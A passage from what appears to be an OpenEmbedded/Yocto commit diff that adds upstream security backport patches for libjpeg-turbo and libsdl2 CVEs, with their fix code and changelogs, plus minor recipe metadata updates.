++ CROPSPEC="${W}x${H}+${X}+${Y}"
++ else
++ Y2=$(( HEIGHT-H ));
++ CROPSPEC="${W}x${H}+${X}+${Y2}"
++ fi
++
++ echo "------------------------------------------------------------"
++ echo $PROGARG $NSARG $COLORSARG -crop $CROPSPEC
++ echo "------------------------------------------------------------"
++ echo
++ for samp in GRAY 420 422 440 444; do
++ $EXEDIR/djpeg $NSARG $COLORSARG -rgb -outfile $OUTDIR/${basename}_${samp}_full.ppm $OUTDIR/${basename}_${samp}.jpg
++ convert -crop $CROPSPEC $OUTDIR/${basename}_${samp}_full.ppm $OUTDIR/${basename}_${samp}_ref.ppm
++ runme $EXEDIR/djpeg $NSARG $COLORSARG -crop $CROPSPEC -rgb -outfile $OUTDIR/${basename}_${samp}.ppm $OUTDIR/${basename}_${samp}.jpg
++ runme cmp $OUTDIR/${basename}_${samp}.ppm $OUTDIR/${basename}_${samp}_ref.ppm
++ done
++ echo
++
++ done
++
++ done
++
++ done
++
++ done
++
++done
++
++echo SUCCESS!
+diff --git a/jdapistd.c b/jdapistd.c
+index 91da642..c502909 100644
+--- a/jdapistd.c
++++ b/jdapistd.c
+@@ -306,16 +306,6 @@ noop_quantize(j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+ }
+
+
+-/* Dummy postprocessing function used by jpeg_skip_scanlines() */
+-LOCAL(void)
+-noop_post_process (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+- JDIMENSION *in_row_group_ctr,
+- JDIMENSION in_row_groups_avail, JSAMPARRAY output_buf,
+- JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
+-{
+-}
+-
+-
+ /*
+ * In some cases, it is best to call jpeg_read_scanlines() and discard the
+ * output, rather than skipping the scanlines, because this allows us to
+@@ -329,16 +319,12 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ {
+ JDIMENSION n;
+ my_master_ptr master = (my_master_ptr)cinfo->master;
++ JSAMPARRAY scanlines = NULL;
+ void (*color_convert) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION input_row, JSAMPARRAY output_buf,
+ int num_rows) = NULL;
+ void (*color_quantize) (j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+ JSAMPARRAY output_buf, int num_rows) = NULL;
+- void (*post_process_data) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+- JDIMENSION *in_row_group_ctr,
+- JDIMENSION in_row_groups_avail,
+- JSAMPARRAY output_buf, JDIMENSION *out_row_ctr,
+- JDIMENSION out_rows_avail) = NULL;
+
+ if (cinfo->cconvert && cinfo->cconvert->color_convert) {
+ color_convert = cinfo->cconvert->color_convert;
+@@ -350,23 +336,19 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->cquantize->color_quantize = noop_quantize;
+ }
+
+- if (master->using_merged_upsample && cinfo->post &&
+- cinfo->post->post_process_data) {
+- post_process_data = cinfo->post->post_process_data;
+- cinfo->post->post_process_data = noop_post_process;
++ if (master->using_merged_upsample && cinfo->max_v_samp_factor == 2) {
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
++ scanlines = &upsample->spare_row;
+ }
+
+ for (n = 0; n < num_lines; n++)
+- jpeg_read_scanlines(cinfo, NULL, 1);
++ jpeg_read_scanlines(cinfo, scanlines, 1);
+
+ if (color_convert)
+ cinfo->cconvert->color_convert = color_convert;
+
+ if (color_quantize)
+ cinfo->cquantize->color_quantize = color_quantize;
+-
+- if (post_process_data)
+- cinfo->post->post_process_data = post_process_data;
+ }
+
+
+@@ -380,6 +362,12 @@ increment_simple_rowgroup_ctr(j_decompress_ptr cinfo, JDIMENSION rows)
+ {
+ JDIMENSION rows_left;
+ my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
++ my_master_ptr master = (my_master_ptr)cinfo->master;
++
++ if (master->using_merged_upsample && cinfo->max_v_samp_factor == 2) {
++ read_and_discard_scanlines(cinfo, rows);
++ return;
++ }
+
+ /* Increment the counter to the next row group after the skipped rows. */
+ main_ptr->rowgroup_ctr += rows / cinfo->max_v_samp_factor;
+@@ -410,11 +398,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
+ my_coef_ptr coef = (my_coef_ptr)cinfo->coef;
+ my_master_ptr master = (my_master_ptr)cinfo->master;
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
+ JDIMENSION i, x;
+ int y;
+ JDIMENSION lines_per_iMCU_row, lines_left_in_iMCU_row, lines_after_iMCU_row;
+ JDIMENSION lines_to_skip, lines_to_read;
+
++ /* Two-pass color quantization is not supported. */
++ if (cinfo->quantize_colors && cinfo->two_pass_quantize)
++ ERREXIT(cinfo, JERR_NOTIMPL);
++
+ if (cinfo->global_state != DSTATE_SCANNING)
+ ERREXIT1(cinfo, JERR_BAD_STATE, cinfo->global_state);
+
+@@ -472,13 +465,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ main_ptr->buffer_full = FALSE;
+ main_ptr->rowgroup_ctr = 0;
+ main_ptr->context_state = CTX_PREPARE_FOR_IMCU;
+- if (master->using_merged_upsample) {
+- my_merged_upsample_ptr upsample =
+- (my_merged_upsample_ptr)cinfo->upsample;
+- upsample->spare_full = FALSE;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- } else {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ if (!master->using_merged_upsample) {
+ upsample->next_row_out = cinfo->max_v_samp_factor;
+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+ }
+@@ -493,13 +480,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->output_scanline += lines_left_in_iMCU_row;
+ main_ptr->buffer_full = FALSE;
+ main_ptr->rowgroup_ctr = 0;
+- if (master->using_merged_upsample) {
+- my_merged_upsample_ptr upsample =
+- (my_merged_upsample_ptr)cinfo->upsample;
+- upsample->spare_full = FALSE;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- } else {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ if (!master->using_merged_upsample) {
+ upsample->next_row_out = cinfo->max_v_samp_factor;
+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+ }
+@@ -537,14 +518,8 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->output_iMCU_row += lines_to_skip / lines_per_iMCU_row;
+ increment_simple_rowgroup_ctr(cinfo, lines_to_read);
+ }
+- if (master->using_merged_upsample) {
+- my_merged_upsample_ptr upsample =
+- (my_merged_upsample_ptr)cinfo->upsample;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- } else {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ if (!master->using_merged_upsample)
+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- }
+ return num_lines;
+ }
+
+@@ -585,13 +560,8 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ * bit odd, since "rows_to_go" seems to be redundantly keeping track of
+ * output_scanline.
+ */
+- if (master->using_merged_upsample) {
+- my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
++ if (!master->using_merged_upsample)
+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- } else {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- }
+
+ /* Always skip the requested number of lines. */
+ return num_lines;
+diff --git a/libjpeg.txt b/libjpeg.txt
+index c50cf90..c233ecb 100644
+--- a/libjpeg.txt
++++ b/libjpeg.txt
+@@ -3,7 +3,7 @@ USING THE IJG JPEG LIBRARY
+ This file was part of the Independent JPEG Group's software:
+ Copyright (C) 1994-2013, Thomas G. Lane, Guido Vollbeding.
+ libjpeg-turbo Modifications:
+-Copyright (C) 2010, 2014-2018, D. R. Commander.
++Copyright (C) 2010, 2014-2018, 2020, D. R. Commander.
+ Copyright (C) 2015, Google, Inc.
+ For conditions of distribution and use, see the accompanying README.ijg file.
+
+@@ -750,7 +750,9 @@ multiple rows in the JPEG image.
+
+ Suspending data sources are not supported by this function. Calling
+ jpeg_skip_scanlines() with a suspending data source will result in undefined
+-behavior.
++behavior. Two-pass color quantization is also not supported by this function.
++Calling jpeg_skip_scanlines() with two-pass color quantization enabled will
++result in an error.
+
+ jpeg_skip_scanlines() will not allow skipping past the bottom of the image. If
+ the value of num_lines is large enough to skip past the bottom of the image,
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch b/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch
new file mode 100644
index 0000000000..68cf89e628
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch
@@ -0,0 +1,133 @@
+From f35fd27ec641c42d6b115bfa595e483ec58188d2 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Tue, 6 Apr 2021 12:51:03 -0500
+Subject: [PATCH] tjLoadImage: Fix issues w/loading 16-bit PPMs/PGMs
+
+- The PPM reader now throws an error rather than segfaulting (due to a
+ buffer overrun) if an application attempts to load a 16-bit PPM file
+ into a grayscale uncompressed image buffer. No known applications
+ allowed that (not even the test applications in libjpeg-turbo),
+ because that mode of operation was never expected to work and did not
+ work under any circumstances. (In fact, it was necessary to modify
+ TJBench in order to reproduce the issue outside of a fuzzing
+ environment.) This was purely a matter of making the library bow out
+ gracefully rather than crash if an application tries to do something
+ really stupid.
+
+- The PPM reader now throws an error rather than generating incorrect
+ pixels if an application attempts to load a 16-bit PGM file into an
+ RGB uncompressed image buffer.
+
+- The PPM reader now correctly loads 16-bit PPM files into extended
+ RGB uncompressed image buffers. (Previously it generated incorrect
+ pixels unless the input colorspace was JCS_RGB or JCS_EXT_RGB.)
+
+The only way that users could have potentially encountered these issues
+was through the tjLoadImage() function. cjpeg and TJBench were
+unaffected.
+
+CVE: CVE-2021-46822
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/f35fd27ec641c42d6b115bfa595e483ec58188d2.patch]
+Comment: Refreshed hunks from ChangeLog.md
+ Refreshed hunks from rdppm.c
+
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+
+---
+ ChangeLog.md | 10 ++++++++++
+ rdppm.c | 26 ++++++++++++++++++++------
+ 2 files changed, 30 insertions(+), 6 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index 968969c6b..12e730a0e 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -44,6 +44,15 @@
+ that maximum value was less than 255. libjpeg-turbo 1.5.0 already included a
+ similar fix for binary PPM/PGM files with maximum values greater than 255.
+
++7. The PPM reader now throws an error, rather than segfaulting (due to a buffer
++overrun) or generating incorrect pixels, if an application attempts to use the
++`tjLoadImage()` function to load a 16-bit binary PPM file (a binary PPM file
++with a maximum value greater than 255) into a grayscale image buffer or to load
++a 16-bit binary PGM file into an RGB image buffer.
++
++8. Fixed an issue in the PPM reader that caused incorrect pixels to be
++generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
++file into an extended RGB image buffer.
+
+ 2.0.3
+ =====
+diff --git a/rdppm.c b/rdppm.c
+index c4c937e8a..6ac8fdbf7 100644
+--- a/rdppm.c
++++ b/rdppm.c
+@@ -5,7 +5,7 @@
+ * Copyright (C) 1991-1997, Thomas G. Lane.
+ * Modified 2009 by Bill Allombert, Guido Vollbeding.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2015-2017, 2020, D. R. Commander.
++ * Copyright (C) 2015-2017, 2020-2021, D. R. Commander.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+ *
+@@ -516,6 +516,11 @@ get_word_rgb_row(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+ register JSAMPLE *rescale = source->rescale;
+ JDIMENSION col;
+ unsigned int maxval = source->maxval;
++ register int rindex = rgb_red[cinfo->in_color_space];
++ register int gindex = rgb_green[cinfo->in_color_space];
++ register int bindex = rgb_blue[cinfo->in_color_space];
++ register int aindex = alpha_index[cinfo->in_color_space];
++ register int ps = rgb_pixelsize[cinfo->in_color_space];
+
+ if (!ReadOK(source->pub.input_file, source->iobuffer, source->buffer_width))
+ ERREXIT(cinfo, JERR_INPUT_EOF);
+@@ -527,17 +532,20 @@ get_word_rgb_row(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+ temp |= UCH(*bufferptr++);
+ if (temp > maxval)
+ ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+- *ptr++ = rescale[temp];
++ ptr[rindex] = rescale[temp];
+ temp = UCH(*bufferptr++) << 8;
+ temp |= UCH(*bufferptr++);
+ if (temp > maxval)
+ ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+- *ptr++ = rescale[temp];
++ ptr[gindex] = rescale[temp];
+ temp = UCH(*bufferptr++) << 8;
+ temp |= UCH(*bufferptr++);
+ if (temp > maxval)
+ ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+- *ptr++ = rescale[temp];
++ ptr[bindex] = rescale[temp];
++ if (aindex >= 0)
++ ptr[aindex] = 0xFF;
++ ptr += ps;
+ }
+ return 1;
+ }
+@@ -624,7 +632,10 @@ start_input_ppm(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+ cinfo->in_color_space = JCS_GRAYSCALE;
+ TRACEMS2(cinfo, 1, JTRC_PGM, w, h);
+ if (maxval > 255) {
+- source->pub.get_pixel_rows = get_word_gray_row;
++ if (cinfo->in_color_space == JCS_GRAYSCALE)
++ source->pub.get_pixel_rows = get_word_gray_row;
++ else
++ ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
+ } else if (maxval == MAXJSAMPLE && sizeof(JSAMPLE) == sizeof(U_CHAR) &&
+ cinfo->in_color_space == JCS_GRAYSCALE) {
+ source->pub.get_pixel_rows = get_raw_row;
+@@ -657,7 +657,10 @@
+ cinfo->in_color_space = JCS_EXT_RGB;
+ TRACEMS2(cinfo, 1, JTRC_PPM, w, h);
+ if (maxval > 255) {
+- source->pub.get_pixel_rows = get_word_rgb_row;
++ if (IsExtRGB(cinfo->in_color_space))
++ source->pub.get_pixel_rows = get_word_rgb_row;
++ else
++ ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
+ } else if (maxval == MAXJSAMPLE && sizeof(JSAMPLE) == sizeof(U_CHAR) &&
+ (cinfo->in_color_space == JCS_EXT_RGB
+ #if RGB_RED == 0 && RGB_GREEN == 1 && RGB_BLUE == 2 && RGB_PIXELSIZE == 3
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch
new file mode 100644
index 0000000000..6668f6e41d
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch
@@ -0,0 +1,97 @@
+From 9679473547874c472569d54fecce32b463999a9d Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Tue, 4 Apr 2023 19:06:20 -0500
+Subject: [PATCH] Decomp: Don't enable 2-pass color quant w/ RGB565
+
+The 2-pass color quantization algorithm assumes 3-sample pixels. RGB565
+is the only 3-component colorspace that doesn't have 3-sample pixels, so
+we need to treat it as a special case when determining whether to enable
+2-pass color quantization. Otherwise, attempting to initialize 2-pass
+color quantization with an RGB565 output buffer could cause
+prescan_quantize() to read from uninitialized memory and subsequently
+underflow/overflow the histogram array.
+
+djpeg is supposed to fail gracefully if both -rgb565 and -colors are
+specified, because none of its destination managers (image writers)
+support color quantization with RGB565. However, prescan_quantize() was
+called before that could occur. It is possible but very unlikely that
+these issues could have been reproduced in applications other than
+djpeg. The issues involve the use of two features (12-bit precision and
+RGB565) that are incompatible, and they also involve the use of two
+rarely-used legacy features (RGB565 and color quantization) that don't
+make much sense when combined.
+
+Fixes #668
+Fixes #671
+Fixes #680
+
+CVE: CVE-2023-2804
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9679473547874c472569d54fecce32b463999a9d]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ ChangeLog.md | 6 ++++++
+ jdmaster.c | 5 +++--
+ jquant2.c | 5 +++--
+ 3 files changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index e605abe73..de0c4d0dd 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -1,3 +1,9 @@ quality values.
++9. Fixed an oversight in 1.4 beta1[8] that caused various segfaults and buffer
++overruns when attempting to decompress various specially-crafted malformed
++12-bit-per-component JPEG images using a 12-bit-per-component build of djpeg
++(`-DWITH_12BIT=1`) with both color quantization and RGB565 color conversion
++enabled.
++
+ 2.0.4
+ =====
+
+diff --git a/jdmaster.c b/jdmaster.c
+index b20906438..8d8ef9956 100644
+--- a/jdmaster.c
++++ b/jdmaster.c
+@@ -5,7 +5,7 @@
+ * Copyright (C) 1991-1997, Thomas G. Lane.
+ * Modified 2002-2009 by Guido Vollbeding.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2009-2011, 2016, D. R. Commander.
++ * Copyright (C) 2009-2011, 2016, 2023, D. R. Commander.
+ * Copyright (C) 2013, Linaro Limited.
+ * Copyright (C) 2015, Google, Inc.
+ * For conditions of distribution and use, see the accompanying README.ijg
+@@ -492,7 +492,8 @@ master_selection(j_decompress_ptr cinfo)
+ if (cinfo->raw_data_out)
+ ERREXIT(cinfo, JERR_NOTIMPL);
+ /* 2-pass quantizer only works in 3-component color space. */
+- if (cinfo->out_color_components != 3) {
++ if (cinfo->out_color_components != 3 ||
++ cinfo->out_color_space == JCS_RGB565) {
+ cinfo->enable_1pass_quant = TRUE;
+ cinfo->enable_external_quant = FALSE;
+ cinfo->enable_2pass_quant = FALSE;
+diff --git a/jquant2.c b/jquant2.c
+index 6570613bb..c760380fb 100644
+--- a/jquant2.c
++++ b/jquant2.c
+@@ -4,7 +4,7 @@
+ * This file was part of the Independent JPEG Group's software:
+ * Copyright (C) 1991-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2009, 2014-2015, D. R. Commander.
++ * Copyright (C) 2009, 2014-2015, 2020, 2023, D. R. Commander.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+ *
+@@ -1230,7 +1230,8 @@ jinit_2pass_quantizer(j_decompress_ptr cinfo)
+ cquantize->error_limiter = NULL;
+
+ /* Make sure jdmaster didn't give me a case I can't handle */
+- if (cinfo->out_color_components != 3)
++ if (cinfo->out_color_components != 3 ||
++ cinfo->out_color_space == JCS_RGB565)
+ ERREXIT(cinfo, JERR_NOTIMPL);
+
+ /* Allocate the histogram/inverse colormap storage */
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch
new file mode 100644
index 0000000000..bcba0b513d
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch
@@ -0,0 +1,75 @@
+From 0deab87e24ab3106d5332205f829d1846fa65001 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Thu, 6 Apr 2023 18:33:41 -0500
+Subject: [PATCH] jpeg_crop_scanline: Fix calc w/sclg + 2x4,4x2 samp
+
+When computing the downsampled width for a particular component,
+jpeg_crop_scanline() needs to take into account the fact that the
+libjpeg code uses a combination of IDCT scaling and upsampling to
+implement 4x2 and 2x4 upsampling with certain decompression scaling
+factors. Failing to account for that led to incomplete upsampling of
+4x2- or 2x4-subsampled components, which caused the color converter to
+read from uninitialized memory. With 12-bit data precision, this caused
+a buffer overrun or underrun and subsequent segfault if the
+uninitialized memory contained a value that was outside of the valid
+sample range (because the color converter uses the value as an array
+index.)
+
+Fixes #669
+
+CVE: CVE-2023-2804
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/0deab87e24ab3106d5332205f829d1846fa65001]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ ChangeLog.md | 8 ++++++++
+ jdapistd.c | 10 ++++++----
+ 2 files changed, 14 insertions(+), 4 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index de0c4d0dd..159bd1610 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -4,6 +4,14 @@ overruns when attempting to decompress various specially-crafted malformed
+ (`-DWITH_12BIT=1`) with both color quantization and RGB565 color conversion
+ enabled.
+
++10. Fixed an issue whereby `jpeg_crop_scanline()` sometimes miscalculated the
++downsampled width for components with 4x2 or 2x4 subsampling factors if
++decompression scaling was enabled. This caused the components to be upsampled
++incompletely, which caused the color converter to read from uninitialized
++memory. With 12-bit data precision, this caused a buffer overrun or underrun
++and subsequent segfault if the sample value read from unitialized memory was
++outside of the valid sample range.
++
+ 2.0.4
+ =====
+
+diff --git a/jdapistd.c b/jdapistd.c
+index 628626254..eb577928c 100644
+--- a/jdapistd.c
++++ b/jdapistd.c
+@@ -4,7 +4,7 @@
+ * This file was part of the Independent JPEG Group's software:
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2010, 2015-2018, 2020, D. R. Commander.
++ * Copyright (C) 2010, 2015-2018, 2020, 2023, D. R. Commander.
+ * Copyright (C) 2015, Google, Inc.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+@@ -225,9 +225,11 @@ jpeg_crop_scanline(j_decompress_ptr cinfo, JDIMENSION *xoffset,
+ /* Set downsampled_width to the new output width. */
+ orig_downsampled_width = compptr->downsampled_width;
+ compptr->downsampled_width =
+- (JDIMENSION)jdiv_round_up((long)(cinfo->output_width *
+- compptr->h_samp_factor),
+- (long)cinfo->max_h_samp_factor);
++ (JDIMENSION)jdiv_round_up((long)cinfo->output_width *
++ (long)(compptr->h_samp_factor *
++ compptr->_DCT_scaled_size),
++ (long)(cinfo->max_h_samp_factor *
++ cinfo->_min_DCT_scaled_size));
+ if (compptr->downsampled_width < 2 && orig_downsampled_width >= 2)
+ reinit_upsampler = TRUE;
+
diff --git a/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb b/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
index 3005a8a789..fda425c219 100644
--- a/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
+++ b/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
@@ -13,6 +13,11 @@ DEPENDS_append_x86_class-target = " nasm-native"
SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}-${PV}.tar.gz \
file://0001-libjpeg-turbo-fix-package_qa-error.patch \
file://CVE-2020-13790.patch \
+ file://CVE-2021-46822.patch \
+ file://CVE-2020-35538-1.patch \
+ file://CVE-2020-35538-2.patch \
+ file://CVE-2023-2804-1.patch \
+ file://CVE-2023-2804-2.patch \
"
SRC_URI[md5sum] = "d01d9e0c28c27bc0de9f4e2e8ff49855"
diff --git a/meta/recipes-graphics/kmscube/kmscube_git.bb b/meta/recipes-graphics/kmscube/kmscube_git.bb
index a1a295f660..0aae6df357 100644
--- a/meta/recipes-graphics/kmscube/kmscube_git.bb
+++ b/meta/recipes-graphics/kmscube/kmscube_git.bb
@@ -1,4 +1,8 @@
-DESCRIPTION = "Demo application to showcase 3D graphics using kms and gbm"
+SUMMARY = "Demo application to showcase 3D graphics using kms and gbm"
+DESCRIPTION = "kmscube is a little demonstration program for how to drive bare metal graphics \
+without a compositor like X11, wayland or similar, using DRM/KMS (kernel mode \
+setting), GBM (graphics buffer manager) and EGL for rendering content using \
+OpenGL or OpenGL ES."
HOMEPAGE = "https://cgit.freedesktop.org/mesa/kmscube/"
LICENSE = "MIT"
SECTION = "graphics"
diff --git a/meta/recipes-graphics/libfakekey/libfakekey_git.bb b/meta/recipes-graphics/libfakekey/libfakekey_git.bb
index ab6f5ac9ed..33ea6fe5a9 100644
--- a/meta/recipes-graphics/libfakekey/libfakekey_git.bb
+++ b/meta/recipes-graphics/libfakekey/libfakekey_git.bb
@@ -13,7 +13,7 @@ SECTION = "x11/wm"
SRCREV = "7ad885912efb2131e80914e964d5e635b0d07b40"
PV = "0.3+git${SRCPV}"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb b/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
index 1a31677978..06bd682823 100644
--- a/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
+++ b/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
@@ -17,7 +17,7 @@ DEPENDS = "virtual/libx11 libxext"
#SRCREV for 1.12
SRCREV = "e846ee434f8e23d9db38af13c523f791495e0e87"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch
new file mode 100644
index 0000000000..d8fa24bc65
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch
@@ -0,0 +1,79 @@
+From a7ff6e96155f550a5597621ebeddd03c98aa9294 Mon Sep 17 00:00:00 2001
+From: Sam Lantinga <slouken@libsdl.org>
+Date: Wed, 17 Jun 2020 08:44:45 -0700
+Subject: [PATCH] Fixed overflow in surface pitch calculation
+
+
+Upstream-Status: Backport
+[https://github.com/libsdl-org/SDL/commit/a7ff6e96155f550a5597621ebeddd03c98aa9294]
+CVE: CVE-2020-14409 CVE-2020-14410
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ src/video/SDL_surface.c | 23 +++++++++++++++--------
+ 1 file changed, 15 insertions(+), 8 deletions(-)
+
+diff --git a/src/video/SDL_surface.c b/src/video/SDL_surface.c
+index 085d9ff1e..bff826f7c 100644
+--- a/src/video/SDL_surface.c
++++ b/src/video/SDL_surface.c
+@@ -28,24 +28,23 @@
+ #include "SDL_yuv_c.h"
+
+
+-/* Check to make sure we can safely check multiplication of surface w and pitch and it won't overflow size_t */
+-SDL_COMPILE_TIME_ASSERT(surface_size_assumptions,
+- sizeof(int) == sizeof(Sint32) && sizeof(size_t) >= sizeof(Sint32));
++/* Check to make sure we can safely check multiplication of surface w and pitch and it won't overflow Sint64 */
++SDL_COMPILE_TIME_ASSERT(surface_size_assumptions, sizeof(int) == sizeof(Sint32));
+
+ /* Public routines */
+
+ /*
+ * Calculate the pad-aligned scanline width of a surface
+ */
+-static int
++static Sint64
+ SDL_CalculatePitch(Uint32 format, int width)
+ {
+- int pitch;
++ Sint64 pitch;
+
+ if (SDL_ISPIXELFORMAT_FOURCC(format) || SDL_BITSPERPIXEL(format) >= 8) {
+- pitch = (width * SDL_BYTESPERPIXEL(format));
++ pitch = ((Sint64)width * SDL_BYTESPERPIXEL(format));
+ } else {
+- pitch = ((width * SDL_BITSPERPIXEL(format)) + 7) / 8;
++ pitch = (((Sint64)width * SDL_BITSPERPIXEL(format)) + 7) / 8;
+ }
+ pitch = (pitch + 3) & ~3; /* 4-byte aligning for speed */
+ return pitch;
+@@ -59,11 +58,19 @@ SDL_Surface *
+ SDL_CreateRGBSurfaceWithFormat(Uint32 flags, int width, int height, int depth,
+ Uint32 format)
+ {
++ Sint64 pitch;
+ SDL_Surface *surface;
+
+ /* The flags are no longer used, make the compiler happy */
+ (void)flags;
+
++ pitch = SDL_CalculatePitch(format, width);
++ if (pitch < 0 || pitch > SDL_MAX_SINT32) {
++ /* Overflow... */
++ SDL_OutOfMemory();
++ return NULL;
++ }
++
+ /* Allocate the surface */
+ surface = (SDL_Surface *) SDL_calloc(1, sizeof(*surface));
+ if (surface == NULL) {
+@@ -78,7 +85,7 @@ SDL_CreateRGBSurfaceWithFormat(Uint32 flags, int width, int height, int depth,
+ }
+ surface->w = width;
+ surface->h = height;
+- surface->pitch = SDL_CalculatePitch(format, width);
++ surface->pitch = (int)pitch;
+ SDL_SetClipRect(surface, NULL);
+
+ if (SDL_ISPIXELFORMAT_INDEXED(surface->format->format)) {
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch
new file mode 100644
index 0000000000..a4ed7ab8e6
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch
@@ -0,0 +1,38 @@
+From 8c91cf7dba5193f5ce12d06db1336515851c9ee9 Mon Sep 17 00:00:00 2001
+From: Sam Lantinga <slouken@libsdl.org>
+Date: Tue, 30 Nov 2021 12:36:46 -0800
+Subject: [PATCH] Always create a full 256-entry map in case color values are
+ out of range
+
+Fixes https://github.com/libsdl-org/SDL/issues/5042
+
+CVE: CVE-2021-33657
+Upstream-Status: Backport [https://github.com/libsdl-org/SDL/commit/8c91cf7dba5193f5ce12d06db1336515851c9ee9.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/video/SDL_pixels.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
